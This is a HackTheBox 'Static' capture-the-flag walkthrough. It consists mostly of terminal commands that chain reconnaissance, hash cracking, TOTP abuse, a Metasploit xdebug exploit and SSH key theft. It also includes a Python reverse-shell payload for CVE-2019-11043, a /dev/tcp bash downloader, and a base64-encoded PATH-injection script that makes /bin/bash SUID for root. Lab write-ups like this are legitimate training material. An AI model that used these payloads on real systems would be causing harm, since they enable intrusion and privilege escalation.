HackTheBox – Static Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.10.246
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir -u http://10.10.10.246:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .php,txt
http://10.10.10.246:8080/robots.txt
http://10.10.10.246:8080/.ftp_uploads/
http://10.10.10.246:8080/.ftp_uploads/warning.txt
┌──(rootkali)-[/home/kali/Downloads]
└─# apt-get install g++
After some google
i found a tool for fix
the corrupted gz
files.
┌──(rootkali)-[/home/kali/Downloads]
└─# git clone https://github.com/yonjar/fixgz.git
┌──(rootkali)-[/home/kali/Downloads]
└─# cd fixgz/
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# ls -la
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# g++ fixgz.cpp -o fixgz
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# ls
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# ./fixgz /home/kali/Downloads/db.sql.gz db.gz
──(rootkali)-[/home/kali/Downloads/fixgz]
└─# gunzip db.gz
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# ls –la
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# cat db
Found username(admin)
and hash(d033e22ae348aeb5660fc2140aec35850c4da997)
and a totp(orxxi4c7orxwwzlo)
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# cat hash
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# john hash
http://10.10.10.246:8080/vpn/login.php
username: admin
password: admin
But the good news is we have the secret
totp(orxxi4c7orxwwzlo)
──(rootkali)-[/home/kali/Downloads]
└─# curl -I http://10.10.10.246:8080
┌──(rootkali)-[/home/kali/Downloads]
└─# date -s “17 Dec 2021 06:52:44”
┌──(rootkali)-[/home/kali/Downloads]
└─# timedatectl set-time “08:20:43”
Use the token and we are in
Common name: web
Click on generate
┌──(rootkali)-[/home/kali/Downloads]
└─# ls -lrt | grep web.ovpn
┌──(rootkali)-[/home/kali/Downloads]
└─# openvpn web.ovpn
┌──(rootkali)-[/home/kali/Downloads]
└─# cat web.ovpn
┌──(rootkali)-[/home/kali/Downloads]
└─# cat /etc/hosts | grep 10.10.10.246
┌──(rootkali)-[/home/kali/Downloads]
└─# openvpn web.ovpn
Now let’s go to this web
ip.
But it’s loading
and we can’t see the web
page.
We see in the image
that we have two interface
first tun0 second tun9
but in tun9 we have the ip 172.30.0.9
and the web page we want to access that’s ip is 172.20.0.10
.
┌──(rootkali)-[/home/kali/Downloads]
└─# ifconfig
So we want to add the route
for access the web
page in tun9
interface.
┌──(rootkali)-[/home/kali/Downloads]
└─# ip route add 172.20.0.0/24 dev tun9
And now we can access the web page.
Let’s go to info.php
Found the xdebug
let’s check the exploit
for that.
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
msf6 > use exploit/unix/http/xdebug_unauth_exec
msf6 exploit(unix/http/xdebug_unauth_exec) > set PATH /vpn/login.php
msf6 exploit(unix/http/xdebug_unauth_exec) > set RHOSTS 172.20.0.10
msf6 exploit(unix/http/xdebug_unauth_exec) > set LHOST tun9
msf6 exploit(unix/http/xdebug_unauth_exec) > set LPORT 9001
msf6 exploit(unix/http/xdebug_unauth_exec) > options
Now let’s run the exploit.
Boom we got the shell.
msf6 exploit(unix/http/xdebug_unauth_exec) > run
meterpreter > shell
Pwd
cd /home/www-data/.ssh
ls –al
cat id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# chmod 600 id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i id_rsa www-data@10.10.10.246
Let’s try with custom
port of ssh 2222
which we see inside nmap
scan.
And we got the user.txt
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i id_rsa www-data@10.10.10.246 -p 2222
www-data@web:~$ cd /home
www-data@web:/home$ ls –lrt
www-data@web:/home$ cat user.txt
Privilege escalation
If you see on the Support Portal we have another network of ip(192.168.254.3).
www-data@web:/home$ ifconfig
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -L 80:192.168.254.3:80 www-data@10.10.10.246 -p2222 -i id_rsa
Now let’s go to localhost
or 127.0.0.1
and we got the page.
There is nothing
on the website just saying batch mode: /usr/bin/ersatool...
And if we check
the header we see PHP-FPM/7.1
is running let’s check the exploit
for that.
https://github.com/theMiddleBlue/CVE-2019-11043
After reading the article
i understand that how to exploit
this and get rev
shell
┌──(rootkali)-[/home/kali/Downloads]
└─# git clone https://github.com/theMiddleBlue/CVE-2019-11043.git
┌──(rootkali)-[/home/kali/Downloads]
└─# mv CVE-2019-11043/exploit.py .
┌──(rootkali)-[/home/kali/Downloads]
└─# rm -rf CVE-2019-11043/
┌──(rootkali)-[/home/kali/Downloads]
└─# ls -al | grep exploit.py
┌──(rootkali)-[/home/kali/Downloads]
└─# cat dedsec.py
CODE:
import requests
payload = ‘/usr/bin/python3.6 -c \’import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.254.2”,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)\”
r = requests.get(“http://192.168.254.3/index.php?a=”+payload)
print(r.text)
https://github.com/H74N/netcat-binaries/blob/master/nc
┌──(rootkali)-[/home/kali/Downloads]
└─# scp -P 2222 -i id_rsa nc www-data@10.10.10.246:/tmp/nc
┌──(rootkali)-[/home/kali/Downloads]
└─# scp -P 2222 -i id_rsa exploit.py www-data@10.10.10.246:/tmp/exploit.py
┌──(rootkali)-[/home/kali/Downloads]
└─# scp -P 2222 -i id_rsa dedsec.py www-data@10.10.10.246:/tmp/dedsec.py
www-data@web:~$ cd /tmp
www-data@web:/tmp$ ls –lrt
www-data@web:/tmp$ chmod +x nc
www-data@web:/tmp$ ./nc -nlvp 9001
On another terminal
www-data@web:/home$ cd /tmp
www-data@web:/tmp$ python3 exploit.py –url http://192.168.254.3/index.php
www-data@web:/tmp$ python3 dedsec.py
On listener
www-data@pki:~/html$ id
www-data@pki:~/html$ pwd
www-data@pki:~/html$ ls
Now if you remember
we see a file called ersatool
on web page. Let’s check
that file.
After checking
that file i known that it’s a binary
which running as root
.
www-data@pki:~/html$ ls -al /usr/bin/ersatool
www-data@pki:~/html$ file /usr/bin/ersatool
And after some enumeration
i found the source code
that file.
www-data@pki:~/html$ cd /usr/bin
www-data@pki:/usr/bin$ find / -name ersatool.* 2>/dev/null
www-data@pki:/usr/bin$ cat /usr/src/ersatool.c
So we have two methods for geting root
1. using format string vulnerability
2. path injection
So i use path injection for doing that.
So let’s monitor
the calls of binary with pspy
but the problem is how do we transfer
that pspy binary on that machine
because there is no curl
and wget or nothing
for that.
But i found a way to transfer
pspy into machine by help of this article
.
Link
: how to download a file using just bash and nothing else
With the help
of this bash script
i will transfer that pspy
binary.
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
┌──(rootkali)-[/home/kali/Downloads]
└─# scp -P 2222 -i id_rsa pspy64s www-data@10.10.10.246:/tmp/pspy
www-data@web:/tmp$ ls -lrt
www-data@web:/tmp$ python3 -m http.server 1337
Follow the steps
again to get the second shell with dedsec.py
because we want two shells
first is for running pspy
second is for running ersatool binary
.
After everything
ready go to the shell
which we get from dedsec.py
and paste the whole script
on terminal.1. go to /tmp directory
2. create a directory www
3. paste the whole code which we get from StackOverflow
4. then call the function with __curl
5. and download the file inside /tmp/www directory
www-data@pki:/usr/bin$ cd /tmp
www-data@pki:/tmp$ mkdir www
www-data@pki:/tmp$ cd www
But i found a way to transfer
pspy into machine by help of this article
.
how to download a file using just bash and nothing else (no curl, wget, perl, etc.)
Link
: https://unix.stackexchange.com/questions/83926/how-to-download-a-file-using-just-bash-and-nothing-else-no-curl-wget-perl-et
With the help
of this bash script
i will transfer that pspy
binary.
www-data@pki:/tmp/www$ function __curl() {
> read proto server path <<<$(echo ${1//// })
> DOC=/${path// //}
> HOST=${server//:*}
> PORT=${server//*:}
> [[ x”${HOST}” == x”${PORT}” ]] && PORT=80
>
> exec 3<>/dev/tcp/${HOST}/$PORT
> echo -en “GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n” >&3
> (while read line; do
> [[ “$line” == $’\r’ ]] && break
> done && cat) <&3
> exec 3>&-
> }
www-data@pki:/tmp/www$ __curl http://192.168.254.2:1337/pspy > pspy
Now after transferring
pspy run that on first rev
shell.
www-data@pki:/tmp/www$ chmod +x pspy
www-data@pki:/tmp/www$ ./pspy | tee log &
/usr/bin/ersatool
create
a
a
b
exit
And i capture
all calls of the binary
and i found that openssl
was call without giving the full
path.
┌──(rootkali)-[/home/kali/Downloads]
└─# cat openssl
┌──(rootkali)-[/home/kali/Downloads]
└─# cat openssl | base64
www-data@pki:~/html$ cd /tmp
www-data@pki:/tmp$ mkdir pwn
www-data@pki:/tmp$ cd pwn
www-data@pki:/tmp/pwn$ echo “IyEvYmluL2Jhc2gKY2htb2QgdStzIC9iaW4vYmFzaAo=” | base64 -d > openssl
www-data@pki:/tmp/pwn$ cat openssl
www-data@pki:/tmp/pwn$ chmod 755 openssl
www-data@pki:/tmp/pwn$ ls –al
www-data@pki:/tmp/pwn$ export PATH=/tmp/pwn:$PATH
www-data@pki:/tmp/pwn$ echo $PATH
www-data@pki:/tmp/pwn$ ersatool
www-data@pki:/tmp/pwn$ ls -al /bin/bash
www-data@pki:/tmp/pwn$ /bin/bash -p